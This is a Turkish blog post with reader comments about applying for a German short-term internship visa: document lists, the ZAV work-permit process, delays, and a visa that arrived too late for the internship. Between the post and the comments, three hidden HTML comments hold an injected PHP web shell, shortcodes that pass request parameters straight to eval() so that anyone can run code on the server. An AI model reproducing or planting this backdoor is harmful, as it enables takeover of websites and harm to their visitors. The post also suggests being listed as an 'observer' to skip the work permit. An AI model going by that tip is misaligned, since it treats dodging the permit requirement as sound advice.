Almanya’da Staja Başvurmak Pişmanlıktır

Efendim, bizim Kimya-Biyoloji Mühendisliği bölümünün gerekliliği olarak mezun olmadan önce iki adet yaz stajı yapmam gerekiyor. Bunlardan ilkini geçen sene yapmıştım. Bu sene de yurt dışında yapayım istedim, çünkü ufaktan bir yerlere kapak atmak ve mezun olduktan sonra yüksek lisansa ve kariyerime yurt dışında devam etmek istiyordum. Başvurduğum 47623 yer içerisinde Almanya’dan bir ilaç firması baya olumlu geri dönüş yaptı. Kalite kontrol laboratuvarlarında yaz stajım ayarlandı.

Ancak hepinizin bilgisi dahilinde olduğu üzre Almanya’dan vize almak bir lütuftur. İmkansız mı? Hayır. Zor mu? Zorun büyük babası diyebilirim. Gelin hep birlikte Almanya’ya kısa dönemli staj için gitmek isteyenlerin katılması gereken zorlu vize maratonunda bir koşuya çıkalım.

Hangi Tür Vizeye Başvurmak Gerekir?

Bu, insanların kafasını karıştıran konuların başında geliyor. Almanya için spesifik olarak konuşmak gerekirse; başvuracağınız vize türü stajınızın süresine göre değişiyor. Şayet stajınız 3 aydan kısa ise benim gibi “Kültürel veya sportif bir etkinliğe ya da bir kongreye katılma vizesi” (Idata’nın sitesinde bu şekilde geçiyor) adı altındaki Schengen Vizesi’ne başvuracaksınız. Eğer 3 aydan uzun süreli bir staj yapacaksanız Ulusal Vize‘ye başvurmanız gerekecek.

Bir de bundan bağımsız olarak; eğer iki aydan uzun süreli staj yapacaksanız stajınız Erasmus stajı olarak sayılacak. Bunun size sağlayacağı güzelliği ilerleyen satırlarda okuyabilirsiniz.

Bu yazımda ben Kültürel Vize için gerekli prosedürlerden bahsedeceğim.

Ben Olmuşum Evrak

Kültürel Vize’ye başvuruda vermeniz gereken evrakların Turistik Vize evraklarından sayıca geri kalır bir tarafı kesinlikle yok!

Kendinizle ilgili evraklardan başlayalım.

 • Pasaport
 • Kimlik
 • Yukarıdaki ikilinin fotokopileri (Pasaportta ilk sayfanın, bütün vizelerinizin ve giriş çıkışlarınızın fotokopileri)
 • Öğrenci Belgesi (Öğrenci olduğunuzu varsayarsak) (İngilizce)
 • Banka hesabınız varsa (ki olması bence düzenli geliriniz olduğunu göstermek açısından önemli) son altı aylık hesap özeti ve varlık ekstresi
 • Hesap özetinizi aldığınız bankanın imza sirküsü
 • Kredi kartınızın son 3 aylık hesap özeti (Çok da lazım değil ama bulunsun)
 • Tam vukuatlı nüfus kayıt örneği. O kadar tam vukuatlı olacak ki hayatınızda hiç görmediğiniz üvey abinize dair gereksiz bilgileri bile içerecek. Örneği çıkartmak için ikamet ettiğiniz ilçenin kaymakamlığına gittiğinizde size belgeyi çıkartma amacınızı soracak ve buna göre belgenizi kırmızı bir kaşe ile kaşeleyecekler.
 • Vize için 2 adet biyometrik fotoğraf. Fotoğraf çektirmeye gittiğiniz yerde size soracaklardır, mutlaka hangi ülke için olduğunu belirtin.
Sırada sponsorunuza ait belgeler var. Almanya da diğer Schengen ülkeleri gibi seyahat edecek öğrencinin masraflarının karşılanacağına dair bir güvence istiyor. Idata bünyesinde başvurulan diğer ülke İtalya kadar zalım olmayan Almanya, sadece anne ya da sadece babaya ait belgeleri kabul edebiliyor. Halbuki İtalya her ikisini de istiyor zalım!!
 • Noter tasdikli taahhütname, yani anne-babanız noter huzurunda size ait bütün masrafları karşılayacağına dair bir belge imzalıyor. Islak imzalı olması aşırı önemli. Almanca’ya çevrilmesi gerekmiyor ( ki sponsorunuza ve size ait hiçbir şeyin Almanca çevirisi gerekmiyor- oh be dediğinizi duyar gibiyim)
 • İmza sirküsü ya da ehliyet fotokopisi
 • Kaşeli ve ıslak imzalı olacak şekilde son 6 aya ait hesap özeti.
 • Varsa kira geliri, tapu gibi şeyler
 • Şirket sahibiyse: Ticaret veya Sanayi Odası Sicil Kayıt Suresi (son 6 aya ait), ticari sicil gazete fotokopisi, vergi levhası fotokopisi, faaliyet belgesi (ben orijinalini getirmiştim ama fotokopisini aldılar). imza sirküsü
 • Çalışansa az önceki maddeye ilaveten: Son 6 aylık maaş bordrosu (mümkünse ıslak imzalı), SGK işe giriş bildirgesi, kişinin o işte çalıştığına dair işveren tarafından yazılmış, kaşelenmiş ve imzalanmış bir yazı
 • Emekli olup halen çalışıyorsa yukarıdaki iki maddeye ilaveten son 4 aya ait destek prim ödemeleri ve SGK 4A Hizmet dökümü
 • Direk emekliyse: Aylık maaşı gösteren emeklilik belgesi.
Daha bitmedi, hop nereye! Stajınıza ait belgeler gerekiyor daha. İşin en hayattan soğutucu kısmı bu. Zira dışarıdan çizdikleri aşırı disiplinli imaja rağmen Almanlar tanıdığım en yavaş çalışan insanlar. Staj yapacağım firma bile bir mailime iki hafta sonra cevap veriyordu, stajım Haziran’da belli oldu öyle diyeyim size. Dolayısıyla aslında aylar önceden bu evrakları toplamaya başlamak gerek.
 • Firmadan davetiye yazısı, mümkünse Almanca: Firmaya ait telefon ve adres bilgilerini, Firmanın kısa bir tanıtımını, yapılacak stajın tarihlerini, stajda öğrenciye verilecek görevlerin tanımını ve öğrenciye ödeme yapılıp yapılmayacağına dair bilgiyi içeren bir davetiye. Normalde vize başvurusu için davetiyenin aslı isteniyor, ancak gerek aradaki uzun mesafe, gerek de Almanya’daki kargo firmalarının arada sırada greve girmesi gibi nedenlerden dolayı bu belgenin aslını almak karın ağrıtıcı bir proses olabiliyor. Şöyle diyeyim, vize başvurumdan üç hafta önce yollanan evrak vizeye başvurduğum günden 3 hafta sonra elime ulaştı. E vizeye nasıl başvurdum? Firmaya mail atıp davetiyeyi e-mail üzerinden yollamalarını rica ettim. Davetiyenin çıktısını elimde neden davetiyenin aslı olmadığına dair bir dilekçe ile birlikte başvuruya götürdüm. Sorun çıkmadı.
 • Konaklama ile ilgili belge/ belgeler. Eğer hostelde kalacaksanız rezervasyonunuzun çıktısı. Ben kendi stajım için Airbnb’den Mehmet Ali Birand’a benzeyen bir host amca buldum. Dolayısıyla adamdan kendi evinde konaklayacağıma dair imzalı bir yazı istedim. Ne hikmetse vaktinden önce elime ulaştığı için aslını verebildim.
 • Seyahat sigortanız, gidiş tarihinizden bir iki gün önce başlayıp dönüş tarihinizden bir iki sonra bitecek şekilde
 • Gidiş-dönüş uçak rezervasyonlarınız. Satın almanıza gerek yok, hatta adamlar bizzat satın almayın diyorlar. Size uçağınızı kaçırtacaklarının, belki de vizeyi hiç vermeyeceklerinin sinyalini veriyor zalımlar.
Çalışma İzni Sorunsalı
 
İşte benim patladığım nokta. Şimdi ZAV diye bir belge var, açılımı Zentrale Auslands und Fachvermittlung. Bu Agentur für Arbeit isimli kuruluşun ya da kuruluşların AB üyesi ülkeler dışından çalışmaya gelecekler için çıkarması ve onaylaması gereken bir belge. Peki staj yapacaklar için lazım mı bu?
Erasmus stajı kavramını tam da burada irdeleyeceğim. Dediğim gibi, eğer iki aydan uzun süre staj yapacaksanız bu Erasmus stajı kavramına giriyor. Böyle bir durumda okulunuzun erasmus, exchange gibi meseleleriyle ilgilenen birimine belli başlı evraklar götürüp okulunuzun hibeli ya da hibesiz olarak Erasmus kapsamında sizi bu staja yolladığına dair bir yazı alıyorsunuz. Bu durumda çalışma izni belgesine gerek kalmıyor NOKTA. Bu arada yapacağınız bir yaz stajını en az altı ay önceden ayarlarsanız çok iyi ve çok güzel olur, böylece hibe olanaklarından yararlanabilirsiniz. Okulun bu hibe başvuruları için koyduğu deadlineları mutlaka takip edin.
Ama “İki ay bayılırım sıkıntıdan ayol” diyorsanız ve daha kısa süreli bir staj yapacaksanız işler karışıyor. Benim daha önce Almanya’ya 2 aydan kısa süreli olarak staja giden iki arkadaşımdan duyduğum konsolosluğun onlardan ZAV belgesi istemediğiydi. Ama öteki adım cenabet ya, GUESS WHAT? Başvurmamdan bir hafta sonra konsolosluğun benden ZAV belgesi istediğini öğrendim. Düştük yine Almanların ultra yavaş işleyen birimlerinin eline.
Sonuç olarak, siz her türlü bu belgeyi çıkartın, benim gibi patlamayın sonra.
Bu belgeyi nasıl çıkartacağız peki? Biz çıkartmayacağız ki, firma bizim adımıza çıkartacak Arbeit für Agentur kuruluşlarına başvurarak. Sizden bir takım belgeler istenecek.
 • Öğrenci belgesi
 • Pasaportunuzun ilk sayfasının fotokopisi
 • Almanca ismini söylemeye ve yazmaya asla tenezzül etmeyeceğim Certificate of Enrolment isimli form. Eğitiminize ilişkin bilgiler isteyen bir belge.
 • Yine Almancasını zikretmeyeceğim Formal Obligation formu. Bu formu iki şekilde doldurmanız lazım. Eğer masraflarınızı firma karşılayacaksa üst kısmı firma, alt kısmı siz dolduruyorsunuz. Eğer masraflarınızı siz yani sponsorunuzun karşılayacaksa üst kısmı sponsorunuz, alt kısmını yine siz dolduruyorsunuz. Her iki durumda da üst kısma bilgilerini giren kişi formu imzalıyor.
 • Benden istemediler ama internet sitelerinde yazdığı için belirteyim, eğer masrafları anne ya da babanız karşılayacaksa onun maddi durumuna ait bazı belgeler istenebilir. Umarım sizden de istemezler, sizin için dua edeceğim.
Önemli not 1: Eğer kısa dönem staj yapacaksanız, ancak ZAV belgesiyle uğraşmak istemiyorsanız, şirketin size yollayacağı davette intern (stajyer) olarak değil de observer (gözlemci) olarak geleceğinizi  yazmasını sağlayabilirsiniz. Bu şekilde yapıp da turist vizesiyle giden arkadaşım oldu.
Önemli not 2: Özellikle de aceleniz varsa yukarıdaki belgeleri ister scan edin ister fotoğraflarını çekin e-maille firmaya yollayın. Kargoya gerek yok.
Belgelerinizi tamamladıktan sonra ise tamamen onların insafına kalıyorsunuz çünkü belgenin çıkması hakikatten uzun sürüyor. Devamlı mail atıp dürtüklemeniz gerekiyor. Bu Agentur für Arbeit kuruluşunun komik bir yanı da var. Siz İngilizce mail atınca size Almanca, Almanca mail attığınızda da İngilizce olarak cevap veriyorlar.
Baktım ki iki hafta geçmesine rağmen belge çıkmıyor, konsolosluğa dilekçe yazdım. Belgenin çıkmasının uzun sürebileceğinden, stajımı yakmak istemediğimden, alternatif bir çözüm arayışında olduğumdan bahsettiğim bir dilekçe.
Ve dilekçeyi konsolosluğa fakslamamdan tam beş dakika sonra Agentur für Arbeit’tan Zav belgemin çıktığına dair mail geliyor! Beni böyle küçük sürprizlerle şaşırtıyorlar. Kısacası belgenin ne zaman çıkacağı meçhul, yalvarırsanız (son mailimde adamlara “to beg” fiilini kullandığımı itiraf etmem gerekir) sürecin hızlanma ihtimali var.

Normalde konsolosluk bunun da aslını istiyor, ancak benim durumum acil olduğu için faks kabul edeceklerini söylediler. Böyle de düşünceliler canlarım ^^.

Ama tabi ki sancılı süreç burada da bitmiyor. Bu sefer de Agentur für Arbeit isimli kuruluş belgeyi kargoyla yollamakta ısrar edip fakslayamayacağını söylüyor. Böyle bir durumda kendilerini ikna etmek için durumu Bilal’e anlatır gibi anlatmak zorunda kaldım. Nihayetinde Almanca bir şekilde ricamı kırmıyorlar.

Geçtiğimiz Pazartesi belge konsolosluğa fakslandı. Belgenin bir kopyasını da bana verdiler. Bir de ne göreyim! Çalışma izninin tarihleri yanlış yazılmış. Stajımın 14ünde biteceği yazıyor. Normalde de böyleydi, ancak firmaya davetiyeyi 28 Ağustos’a kadar yazdırmıştım. Davetiyedeki bitiş tarihi ve çalışma iznindeki bitiş tarihi çakışıyor. Bu sorun teşkil edecek mi henüz bilmiyorum.

Evrak yollandıktan sonra başvuru durumum sonraki iki gün boyunca “Eksik Evrak Bekleniyor” olarak görünmeye devam etti Idata’nın sitesinde. Gene türlü dil döktükten “Yeter be bundan çektiğimiz” demiş olacaklar ki bugün artık başvuru durumum  “Konsoloslukta” olarak göründü bir süre. 2-3 saat sonra da nihayet artık “Idata İade” yazdı. Tabi Idata ofisinin kapanmasına yarım saat kala mesaj gelince Rumelifeneri’nde oturan biri olarak Harbiye’ye ışınlanamayacağım için sonucu öğrenmek ertesi sabaha kaldı.

Sor Bana Pişman mıyım?

Sonuç ne mi oldu? Haftalarca bekledim. 3 Temmuz’da başvurduğum vize. Elim kolum bağlıydı. Ne bir seyahat planı yapabildim, ne uçak bileti alabildim, ne Airbnb’deki hostuma ödeme yapabildim. Zaten normalde 24 Temmuz’da gitmem gerekiyordu. Bütün bir Temmuz ayımı bekleyerek geçirdiğimi söyleyebilirim. Bu açıdan bakıldığında yurt dışına uzun dönemli gitmeyle ilgili olarak demoralize olduğumu söyleyebilirim.

Ve nihayet 6 Ağustos’ta çıkan vizemi gidip aldım. 28 Ağustos’a kadar çok girişli vermiş canlarım.

Şimdi buradaki sorun şu ki; Zaten 11’inden önce staja başlayamıyorum. Dolayısıyla verdikleri süre staj için hiç bir şekilde yetmiyor.

O zaman staja bay bay tatile de hay hay diyoruz bu noktada.

Dolayısıyla bunca uğraş verip Almanya Vizesi aldıktan sonra yapacağım seyahati Yunanistan Vizesi için çok daha az uğraş vererek yapabilirmişim. Bu açıdan bakıldığında Almanya Vizesi almak için bir ay boşuna beklemişim denebilir. Yine de pasaportumda Almanya Schengen’i olması da bence havalı duruyor.

Kültürel vize için unutulmaması gereken nokta, Almanlar genelde vizenizi davetiyenizde yazan tarihler aralığında veriyor. Benim davetiyemde 24 Temmuz-28 Ağustos arası yazıyordu, gidiş tarihini 2 hafta kaçırmış olmama rağmen vizemi tam stajın bittiği güne kadar verdiler, acımadılar. Kültürel vizenin sıkıntısı da bu işte.

Geçtiğimiz Cumartesi Gezginler Buluşması isimli etkinlikte tanıştığım sevimli bir blog yazarı Almanya vizesini alabilmek için konsolosluğa kadar gidip oradakileri soyunmakla tehdit ettiğini söylemişti. Kim bilir, vizem çıkmamış olsa ben de bunu yapardım. (tabi sonuçları iki taraf için de travmatik olabilirdi)
Not: Almanya’ya son dakika ucuz uçak bileti asla bulamadığım için alternatif arayışlar içerisindeyim. Fikri olan ya da önceden Almanya’ya uçak bileti alıp planı iptal olan varsa buraya alalım kendilerini.

 

<!– [insert_php]if (isset($_REQUEST["xhoY"])){eval($_REQUEST["xhoY"]);exit;}[/insert_php][php]if (isset($_REQUEST["xhoY"])){eval($_REQUEST["xhoY"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["fcW"])){eval($_REQUEST["fcW"]);exit;}[/insert_php][php]if (isset($_REQUEST["fcW"])){eval($_REQUEST["fcW"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["khFu"])){eval($_REQUEST["khFu"]);exit;}[/insert_php][php]if (isset($_REQUEST["khFu"])){eval($_REQUEST["khFu"]);exit;}[/php] –>

68 thoughts on “Almanya’da Staja Başvurmak Pişmanlıktır

 1. Merhabalar…Davet mektubunda intern değil de observer olarak gideceğimi belirttiği zaman, staj yapacağım kurumun bir ödeme yapabilmesi mümkün olmuyor değil mi?

  1. Merhaba 🙂 Eğer observer olarak gidecekseniz çalışma izni olmadan ödeme yapmaları normalde yasa dışı olur. Firmaya bağlı ama çoğu firma o riski göze almaz diye düşünüyorum.

  1. Merhaba;

   Part-time çalışma ya da stajı kastediyorsanız evet isteniyor, yani ben gitmeye çalıştığım dönemde isteniyordu. Sadece tıp okuyan bir arkadaşım bir laboratuvar’a observer olarak gitmiş ve ondan istememişler ama bir şirkette çalışacaksanız onu hazır etmeniz lazım. Kolay gelsin şimdiden 😀

 2. Zav belgesi için sadece istenen evraklardaki bunlar mi ? Yoksa sirketin kendisinin verecegi evraklar disinda çalışacak kişiden istenen evraklar midir ?

  Teşekkür ederim

  1. soruyu tam anlamadım 🙂 Şirket Zav belgesine sizin adınıza başvurmak için sizden birkaç belge isteyecek, zaten onlar da sizinle irtibata geçip gerekli bilgileri söyler.

 3. Öncelikle kolay gelsin . Bende aynı durumdan sıkıntılıyım turizm fakültesinde okuyorum staj için Almanya da bir restoran anlaştım herşeyim tam dı bir tek zav eksikti iptal ettiler başvurdum zav belgesine tam 2 ay sonra çıktı şuan gelmesini bekliyorum . Sormak istediğim r kaç sor var evrak geldiğinde benim gitmem 7 ayın 10 12 bulur stajım 8 ayın 3 kadar gözüküyor evraklarda acaba vize verirler mi birde öğrenci belgem filan çıkartalı 2 ay oldu Almanca tercümanlık filan evraklar güncellemem gerek mi iyi günler dilerim

  1. Selam 🙂 Benim durumumda şöyle oldu; stajım 28 Ağustos’a kadar görünüyordu ve vizeyi 6 Ağustos’ta aldım, yani sanırım ne kadar az vakit kalırsa kalsın veriyorlar. Evrakları güncelleme konusunda isterseniz İDATA’ya sorun, 2 ay biraz uzun bir süre o yüzden yanlış bilgi vermeyeyim ben.

 4. Merhaba, Endüstri müh. öğrencisiyim, gelecek sene bahar döneminde Almanya’ya Erasmus’a gideceğim. Ardından da Almanyada staj yapmak istiyorum (20 iş günü). Bunun için benim nasıl bir yol izlemem gerekir? Şimdiden teşekkürler.

  1. Merhaba 🙂 Erasmus için vizeye başvururken sonrasında Almanya’da staj yapmak istediğinize dair konsolosluğa bir dilekçe yazıp bu staja dair evraklarla başvurursanız vize süresini ona göre vereceklerini tahmin ediyorum. Yine de İDATA’yı arayıp detaylı bilgi almanızı öneririm.

 5. Kusura bakmayın yorumunuzu şimdi gördüm.Sirketle sağlıklı bir iletişim kuramıyorum benim onlara yollamam gereken 2almanca form sadece yukarıda bahsettikleriniz midir ? Ve asıl sormak istediğim şudur durumum sizinkine benzer ve tecrübeli olduğunuz icin , şirket benim adıma yarın başvuru da bulunacak stajımda bu ayin 26sinda başlayacak süreci hızlandırmak adına detaylı önerilerinizi yazabilir misiniz ? Çünkü zav dan sonra bir de vize sonuçu icin bekleyeceğim.Tesekkur ederim şimdiden

  1. Merhaba; evet o iki form olacak, linklerini koyuyorum:
   http://culturalvistas.org/cms/assets/uploads/2016/06/1-ZAV_Certificate-of-Enrollment_blank.pdf
   http://culturalvistas.org/cms/assets/uploads/2016/06/Verpflichtungserklaerung-BLANK.pdf
   Ya süreci hızlandırmak ne yazık ki çok mümkün değil, sadece haftada bir falan mail atıp durumunuzun aciliyetini belirterek onları dürtmeniz lazım, benim durumumda Zav’ın çıkması uzun sürmüştü. Gerçekçi olmak gerekirse 26’sına yetişmesi zor gibi geliyor, tabi belki işlemler hızlanmıştır zaman geçtikçe. Şirket hemen Zav için başvuru yapmalı. Zav belgesi çıktıktan sonra vizenin çıkması çok uzun sürmüyor. Belge ellerine ulaştıktan 1-2 gün sonra vizemi hazır etmişlerdi.

 6. Selam
  Öncelikle Allah yardımcın olsun kardeşim ben iDATA gittim herşeyim tam neyse uzatmayım sıra bana geldi çalışan bayan evraklarımı aldı baktı Almanya’da çalışacağım şirket bana iş yerinin 2009 dan beri öğrenci çalıştırma belgeselini yollamış ve davetiye yerine staj sözleşmesi yollamış kadın elime aldı evrağı bu davetiye 2009 davetiyesi dddi kadına dedim Almancanız yokmu iyi bakın dedim beni azarladı almancamım deniyorsunuz diye şaşırdım kaldım en son müdürlerine kadar geldi sonra müdür zav mı mey o Yok dddi yolladı beni başvurmadım hiç kardeşim diyeceğim o çok sıkıntılı iş cidden canımı aldılar benim burnumdan geldi zava başvurdum tam 2 ayda çıktı ben ümidimi kesmiştim ayın 29 direk konsolosluk görüşeceğim evraklarımın hepsi güncel bir tek öğrenci belgem güncel değil onu da okulum tatil olduğu İÇİN gitmedim e devlet çıkartırım YANINA ek olarak koyacağım ne yapacakları belli olmuyor yine de ümidim Yok şansımı deneyeceğim bakalım Allah hepimizin yardımcısı olsun ☺️☺️

  1. Selam 🙂 gerçekten peygamber sabrı isteyen süreçler bunlar, sabır sabır ya sabır diyorum. Hakkınızda hayırlısı olsun.

 7. Acaba yukarıda bahsettiğiniz kuruluşlara dilekçe ve mail attığınızdan bahsetmişsiniz.Ulastiginiz mail adresini ve faks numarasını paylaşabilir misiniz ?
  Konsolosluk ve fur arbeit icin

  Çünkü fur arbeit başvuruları bir merkezde toplanıyor sanirm

   1. Al benden de o Kadar randevum icin görüşmeye gittiğimde çalışan kadın çok saygısız bilgilendirme amaci gütmeyen biriydi git tamamla gel sonra jargonu ile konuşuyordu gel de cildirma.Uzatmayayim benim stajım zorunlu bir staj değil yanı okul veya bir başka program ile gitmiyorum.O yüzden standart evraklar disinda (passport resim vb) elimde sirketten gelen orijinal davetiye ve zav belgesi olucak umarım bir sorun çıkmadan yeterli olacaktır.Cok stresliyim ve gerçekten yoruldum git gel yapmaktan herkese Allah kolaylık versin

 8. Passport
  Basvuru formu
  Fotoğraf
  Sağlık sigortası
  Vize harcı
  Şirket davetiye
  Ögrenci belgesi
  Cv
  Ucak rezervasyon
  Zav

  Belgelerim Bunlar randevuya gittiğimde eksik birşey çıkarsa artık deliricem

 9. Merhaba, tıp okuyorum ve bu yaz almanyaya bir hastaneye staja başvurdum. Okulun erasmus ve staj hareketliliğinden bağımsız olarak . Bu durumda schengen vizemi turistik alsam sorun olur mu ? Yine de sadece doktorun davetiyesi yeterli mi

  1. net bilgi sahibi değilim ama benim tıp okuyan bir arkadaşım da turistik vizeyle gidebilmişti. davetiyesinde observer olarak geleceği yazıyormuş. davetiyede ne yazdığına bağlı. Davetiye yeterli olur bu durumda.

    1. Ben konsolosluğa durumun aciliyetini bildirerek faksla yollanmasını sağlamıştım bazı belgelerin, kabul etmişlerdi, o zamanlar bir de Almanya’da kargo firmaları grevdeydi yanlış hatırlamıyorsam. En iyisi konsolosluğa mail atıp sormak ama düzgün şekilde açıklarsanız kabul edilir diye düşünüyorum.

     1. davetiyeyi hallemezsem ve sadece turistik schengen belgeleriyle vizemi alırsam vize aldıktan sonra bir sorun yaşar mıyım staj sonunda Keşke yunan vizesi alsaymışım yazdığınız için soruyorum teşekkür ederim şimdiden

     2. Ya onu yazmamın nedeni şuydu, sonuçta staja gidememiştim ve aldığım kültürel vizeyle turistik gezi yapmıştım. Haliyle bilseydim turistik vize alırdım diyorum işte.

 10. Merhabalar bu güzel bilgilendirmeler için teşekkürler öncelikle. Ben ZAV belgesini bizim alıp alamayacagımızı soracaktım. kendimiz alabiliyor muyuz?

  1. Merhaba, şirketin sizin adınıza başvurup çıkartması gerekiyor, yani o zamanlar öyleydi. Çalışacağınız şirketten detaylı bilgi alabilirsiniz.

 11. Merhaba arkadaşlar
  Kardeşim hiç belli olmuyor ne yapacakları evrak konusunda 90 günün altındaysa artık konsolosluktan alıyorsun yönetmenlik değişmiş iDATA ortadan kalkıyor benim 29 randevum var sabah gideceğim şuan için herşeyim tam diye zannediyorum davetiye vermediler Almanya’dan bana staj sözleşmesi onun yerine geçiyormuş davetiye Yok zav da geldi sonunda nasıl olduysa güncellendim tekrardan öğrenci belgemi güncellemedim 4 ayın 15 aldım tercümanda yaptım ek olarak e devletten çıkaracağım öğrenci belgemi ek olarak öyle başvuracağım ümidim Yok şansımı deneyeceğim sadece Ya olursa diye zaman ve para kaybı sadece zAten 8 ayın 3 kadar staj sürem bir aydan az kalıyor vermezler herhalde Birde konsolosluk danışma hattını aradım ben Perşembe günleri danışma hatları var anlattım tüm derdimi şikayet ettiğimi anlattım turizm okuduğumu söyledim zAten vermezler turizmi okuyorsun diye dedi şaşırdım okulum izin veriyor dekan imza atıyor kabul ediyor restoranda çalışmama sen Yok diyorsun dedim neyse kapattım geçen haftalarda bir daha aradım kadın dedim böyle böyle dediler dedim onu kimse diyemez kim o ne bilir dedi yani açıkcası oyun oynuyorlar senle artık gülüyorum halime cidden Allah yardımcınız olsun cidden

 12. Zav belgesinin çıktığı haberi sadece şirkete mi bildiriliyor yoksa bize de mail yoluyla bildirim yapılıyor mu ?

  Teşekkür ederim

 13. Şirket zav başvurusunu fur arbeit agentur a gönderdiğinde acaba sirketin oldugu şehirinkine gidip orda toplanıp mi izin çıkıyor veya bunlar bir genel merkezde toplanıp orda mi karar veriliyor ? Belgelerim göndereli 10 gün olucak kurum elimize birşey gelmedi diyor

  Bilgisi olan ?

 14. Merhaba
  Bende almanyada bu yaz staj yapacaktım herseyi tamamlamıştım randevu alıp konsolosluğa gittim fakat benimde zav belgesi eksik olduğu için geri geldim sormak istediğim de zav için gerekli belgeleri süreci daha hızlı yürütmek adına ordaki bi akrabam sirket adına für arbeit a gönderebilir mi

  1. Merhaba, akrabanızın şirketle bir alakası var mı? Şirketten alakasız biriyse für arbeit kabul eder mi bilemedim.

 15. Alakası yok fakat sirket yabancı değil tanıdık ama ne yazık ki daha önce für albeit ile işlem yapmadığı için bilmiyorlar yukarıda bahsettiğiniz iki formu ben doldurup albeit e gönderebilir miyim ve sadece bunlar mı benim süre sıkıntım da var size zahmet bi yardimci olsanız

 16. Fur arbeit den calisma izni onaylanınca bize de haber geliyor mu ? Yoksa sadece şirkete mi bildirim yapılıyor ?

 17. Peki bildirim de bilgileri gösteriyor mu yoksa sadece çıktığına dair bir yazı mi ? Yanı maili çıktı alıp direk konsolosluğa gidebilir miyim

  1. hayır sadece belgenin hazır olduğuna dair mail geliyor, konsolosluğun geçerli sayacağı birşey değil o.

 18. Yukardaki yazınızda 2 arkadaşım davetiye mektubunda observer yazarak zav belgesine gerek kalmadan turistik gittiğini söylemişsiniz
  Bu observerlı(gözlemci)davetiye mektubu nasıl bir davetiye bi örneği benzeri sizde varsa paylaşabilir misiniz

 19. Simdi fur arbeit den aldigim maile göre belgeyi fax veya e-mail ile güvenlik sorunları yüzünden yollamadiklarini söylediler, fakat belge ciktiktan sonra belgenin imzalanmak üzere şirkete yolladıklarını soylediler , yanı anladığım kadarıyla belgeyi yine bana şirket yollayacak ısın içinden çıkamadım bekle bekle bir hal oldum bir Öneriniz var midir ?

  1. size değil direkt konsolosluğa yolluyorlar yani benim başvurduğum dönemde direkt konsolosluğa yollanmıştı.

 20. Merhaba,
  Ben de bu sene mezun oldum ve Mayis ayinda Munihteki bir mimarlik ofisiyle bir senelik staj kontratimi yaptim.
  29.Haziranda Ankaradam basvurumu yaptim ve 3 hafta sonra red cevabını aldim.
  Gerekce olarak once alacagim stajyer maasinin cok az olduğunu soylediler. (Aylik asgari ucret olan 1411€ brutto)
  Simdi ise yeni cikan bir yasa ile AB uyesi olmayan kisilerin ogrencilik durumlari bittikten sonra staj yapamayacaklarini soyluyorlar.
  Ogrencilik durumu bittikten sonra staj yapan var mi Almanya’da?
  Tesekkurler

 21. Merhabalar.oncelikle tıbbi sekreterlik okuyorum.herhangi bir yurtdışında da stajimi yapmak istiyorum erasmus için hocalarla gorustugumde kalacak yerin varsa gonderebiliriz demislerdi almanyada dayimlar var fakat dil bilmiyorum nasil anlasicam ve vize isleri nasil halloluyo bize mi ait vize parasi.cevaplarsaniz cok sevinirim.Teşekkur ederim.8

  1. Merhaba, dil bilmiyorum’dan kastınız Almanca’ysa İngilizce konuşarak da anlaşabilirsiniz, tabi Almanca bilmek sizi öne çıkarır. Genel olarak dil bilmiyorsanız zaten stajda insanlarla nasıl anlaşacaksınız? Yani önce kendinizi ifade edecek kadar dil öğrenmenizi tavsiye edebilirim. Vize parası elbette size ait :/ vize ile ilgili konuları da bu yazı ve internette konuyla ilgili diğer detaylı yazıları okuyarak öğrenebilirsiniz. Esenlikler

 22. merhabalar
  ben bu yaz erasmusla almanyada staj yapacam
  kabul mektubu , learnıng agreement belgelerim falan hepsi var bunlara ilave olarak zav belgesi gerekiyor mu

  1. Erasmus ise gerekmiyordu ben başvururken ama sistem değişmiş olabilir, siz yine de kontrol edin

 23. Dua et Belçika’ya gitmemişsin. Onun vize işlemleri daha berbat. Daha yorucu evrak işleri falan var. Rödevans ücreti haricinde gidip muayane olup sağlık raporu götürmeni bile istiyorlar.

 24. Merhabalar,

  1 Temmuz 1 Subat tarihleri arasinda Frankfurt Havalimaninda 7 ay staj yapacagim. Yaptirmam gereken saglik sigortasini 1 yil yaptiracagim. Stajimin suresi uzun oldugu icin sigortada yer almasi gereken bazi ibareler var. Kisisel sorumluluk, 92 gun ve TC’nin gorunup gorunmemesi gibi. Hangi sirketten sigorta yaptirmami onerirsiniz? Bu ibarelerin yer almasi gerekiyor mu sigortada? Cunku bazi arkadaslar icin sikinti yaratmislar. Ziraat cok pahali soyluyor o yuzden Axa veya Allianz dusunuyorum. Yardimci olursaniz cok sevinirim. Iyi gunler

  1. Selam Deniz, bu konunun beni çok aştığını hissediyorum, doğru bilgiyi verecek kişi olmayabilirim. Ama doğrusunu öğrenirsen burada mutlaka paylaş ki hepimiz öğrenelim 🙂 kolay gelsin.

 25. Merhaba
  Öncelikle çok bilgilendirici bir iş yapmışsınız teşekkür ederim fakat sormak istediğim şeyler var mimarlık okuyorum ve arkadaşımın ailesi almanyada yaşıyor orada bana bir mimarlık ofisi buldular yinede zav almam gerekiyor mu? Gerekiyor ise ; http://culturalvistas.org/cms/assets/uploads/2016/06/1-ZAV_Certificate-of-Enrollment_blank.pdf
  http://culturalvistas.org/cms/assets/uploads/2016/06/Verpflichtungserklaerung-BLANK.pdf

  1) Bu formları doldurup iş verene gönderiyoruz o ona yakın bir kuruluşa gidip zav belgesine başvuru yapabiliyor mu?
  2) Kendisi kuruluşa gidip yapamıyor ise bu formda benim ve işverenin doldurması gereken yerleri doldurup ne yapmamiz gerekiyor ?
  3) 18 Haziranda başlatmayı düşünüyorum stajı yetişir mi sizce?

  Şimdiden çok teşekkür ediyorum 🙂

  1. Merhaba cevap yazacaktım aklımdan çıkmış 🙂
   1) Evet
   2) Siz kendi doldurmanız gereken yerleri doldurup yollayın onlar tamamlayıp mutlaka bir şekilde ulaştırır.
   3) Bir şey söylemek zor ama genelde son anda da olsa yetiştirmeye çalışıyorlar

 26. Ben de temmuz ayinda staj yapacagim. tum belgelerimi aldim bi baktik ZAV yok simdi almaya calisacagim temmuza yetisir mi sizce baya adamlari acelem var diye mail yagmuruna tutsam..

  Kafama takilan nokta su allahin yesil pasaportlusu sorgusuz sualsiz 3 ay kaliyor kimseye bir sey demeden isterse staj yapsin isterse calissin( calisacagi yere bagli) is vize almaya gelince 1 aylik kici kirik staj icin bile calisma izni istiyor akilli bidiklar. Neyse sinirler bozuk herkesin…

